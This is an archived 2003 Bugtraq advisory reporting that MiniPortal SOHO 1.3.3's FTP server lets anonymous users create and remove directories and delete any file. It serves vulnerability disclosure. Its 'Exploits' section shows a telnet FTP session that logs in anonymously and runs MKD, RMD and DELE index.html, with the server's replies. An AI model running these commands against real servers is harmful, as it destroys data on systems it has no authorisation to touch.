| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 30 Mar 2003 19:15:25 -0000 From: subj <r2subj3ct@...lan.org> To: bugtraq@...urityfocus.com Subject: MiniPortal Product : MiniPortal SOHO Version : 1.3.3 OSystem : Windows Authors : Instant Servers Inc WebSite : http://www.instantservers.com Problem : Create and Remove directories with anonymous access Description: ------------ eng: ==== MiniPortal includes the following components: WEB Server [Apache 1.3.27] FTP Server DNS Server During research of components of the server, the following was revealed: The anonymous user can create and delete directories on the server, And also can delete any files on it. Exploits: --------- >>Telnet 127.0.0.1 21 220 FTP Server, ready >> USER anonymous 331 Password required >> PASS anonymous@...alhost 230 User logged in >>MKD test 257 "test" created >>RMD test 200 Okay >>DELE index.html 200 Okay Contacts: --------- r2subj3ct@...lan.org subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
Powered by blists - more mailing lists